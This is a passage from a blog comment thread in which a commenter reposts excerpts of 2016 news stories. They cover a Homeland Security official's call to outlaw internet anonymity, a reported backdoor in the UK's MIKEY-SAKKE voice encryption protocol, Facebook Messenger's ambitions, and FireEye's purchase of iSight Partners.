    http://yro.slashdot.org/story/16/01/20/1321243/senior-homeland-security-official-says-internet-anonymity-should-be-outlawed

    A senior Homeland Security official recently argued that Internet anonymity should be outlawed in the same way that driving a car without a license plate is against the law. “When a person drives a car on a highway, he or she agrees to display a license plate,” Erik Barnett, an assistant deputy director at U.S. Immigration and Customs Enforcement and attaché to the European Union at the Department of Homeland Security, wrote.

    Senior Homeland Security official says Internet anonymity should be outlawed
    http://www.dailydot.com/politics/anonymity-homeland-security-erik-barnett/

    A senior Homeland Security official recently argued that Internet anonymity should be outlawed in the same way that driving a car without a license plate is against the law.

    Erik Barnett, an assistant deputy director at U.S. Immigration and Customs Enforcement and attaché to the European Union at the Department of Homeland Security, outlined his argument in an article titled “Whose Privacy Are We Protecting? Balancing Rights to Anonymity with Rights to Public Safety,” published in FIC Observatory, a French publication dedicated to debates about cybersecurity.

    “When a person drives a car on a highway, he or she agrees to display a license plate,” Barnett wrote. “The license plate’s identifiers are ignored most of the time by law enforcement. Law enforcement will use the identifiers, though, to determine the driver’s identity if the car is involved in a legal infraction or otherwise becomes a matter of public interest. Similarly, should not every individual be required to display a ‘license plate’ on the digital super-highway?”

    The suggestion yielded backlash quickly. Nate Cardozo, a staff attorney at the Electronic Frontier Foundation, called the idea “plainly unconstitutional.”

    Barnett’s essay didn’t offer much in the way of specifics. Instead, he asked a number of provocative questions.

  47. Tomi Engdahl says:

    For fsck’s SAKKE: GCHQ-built phone voice encryption has massive backdoor – researcher
    Well, what did you expect?
    http://www.theregister.co.uk/2016/01/19/key_voice_encryption_protocol_has_backdoor/

    The UK government’s official voice encryption protocol, around which it is hoping to build an ecosystem of products, has a massive backdoor that would enable the security services to intercept and listen to all past and present calls, a researcher has discovered.

    Dr Steven Murdoch of University College London has posted an extensive blog post digging into the MIKEY-SAKKE spec in which he concludes that it has been specifically designed to “allow undetectable and unauditable mass surveillance.”

    He notes that in the “vast majority of cases” the protocol would be “actively harmful for security.”

    Murdoch uses the EFF’s scorecard as a way of measuring the security of MIKEY-SAKKE, and concludes that it only manages to meet one of the four key elements for protocol design, namely that it provides end-to-end encryption.

    However, due to the way that the system creates and shares encryption keys, the design would enable a telecom provider to insert themselves as a man-in-the-middle without users at either end being aware. The system would also allow a third party to unencrypt past and future conversations. And it does not allow for people to be anonymous or to verify the identity of the person they are talking to.

    In other words, it would be the perfect model for the security services.

    The CESG – and the UK’s civil service – started pushing the approach late last year and has incorporated it into a product spec called Secure Chorus.

    There is increasing demand for voice call encryption. Unlike instant messaging, which effectively allowed companies to start from scratch and so has resulted in a number of highly secure products, phone calls run over older infrastructure and almost always pass through telecom companies, usually in an unencrypted form (although the information may be encrypted while in transit).

    MIKEY-SAKKE is unusual in that unlike most secure messaging and phone systems, it makes no effort at all to protect the identity of the people communicating with one another, providing easy-to-access maps of metadata.

    If at first you don’t succeed

    He also notes that GCHQ tried 20 years ago to introduce a similar protocol but that a “notable difference” exists between that effort and this MIKEY-SAKKE approach: “While the GCHQ protocol was explicitly stated to support key escrow to facilitate law enforcement and intelligence agency access, this controversial aspect has not been included in the description of MIKEY-SAKKE and instead the efficiency over EDH is emphasised.”

    Or in other words, the UK government doesn’t want you to know that it can spy on everything you say.

  48. Tomi Engdahl says:

    Facebook Messenger: All your numbers are belong to us
    The (social) world is not enough, for Zuckerberg
    http://www.theregister.co.uk/2016/01/20/facebook_messenger_has_designs_on_mobile_world/

    Facebook started 2016 with the bold claim that it intends to eradicate phone numbers and replace web browsing, but the Social Network has a mountain to climb before Facebook Messenger becomes the centre of our online world.

    That’s the stated intention of the Zuckerberg empire – to replace all our myriad internet communication systems with one interface.

    Facebook claims that its Messenger app has been installed 800 million times.

    If Facebook is going to recruit the shops, taxi companies and airlines it needs to make Messenger a one-stop internet shop it will need to get the app installed across the demographics before Microsoft (with Skype) steps in to take the cream.

    The medium is the Messenger

    With that in mind, Facebook Messenger was forked from the main Facebook mobile app back in 2011, but messaging remained possible in the main app until 2014. These days, the Facebook app will notify you that a message has been received, but if you want to read that message then you’ll have to download and install Facebook’s new Trojan Horse.

    Every month, 600 million Chinese are using Weixin, Tencent’s WeChat client, to book taxis, check into flights, play games, buy cinema tickets, make doctors’ appointments, and even manage bank accounts, all without touching the web browser.

    In China, messaging has become the platform of choice for accessing a wide variety of services, and Facebook plans to replicate that model in the rest of the world – with it owning the messaging platform, obviously.

  49. Tomi Engdahl says:

    Reuters:
    FireEye buys cyber intelligence firm iSight Partners for $200 million
    http://www.reuters.com/article/us-isight-fireeye-m-a-idUSKCN0UY2OU?feedType=RSS&feedName=technologyNews

    FireEye Inc said on Wednesday it paid $200 million to buy privately held iSight Partners in a move to boost its cyber intelligence offerings for governments and businesses as the sector consolidates.

    The deal brings together two of the world’s most prominent cyber firms: FireEye’s Mandiant forensics unit is a leader in helping companies investigate cyber attacks, while iSight has uncovered major cyber campaigns from Iran, Russia and other nations.

    It follows a steep decline in valuations of public and private cyber security firms, which some investors consider too richly valued after a series of high-profile cyber attacks on the U.S. government, Sony Corp and Target Corp spurred interest in the sector.

    Watters told Reuters in an interview that he decided to sell after the market for funding became more difficult.

    “If big companies come along to acquire us and they give us a great payout, you’ve got to consider it.”
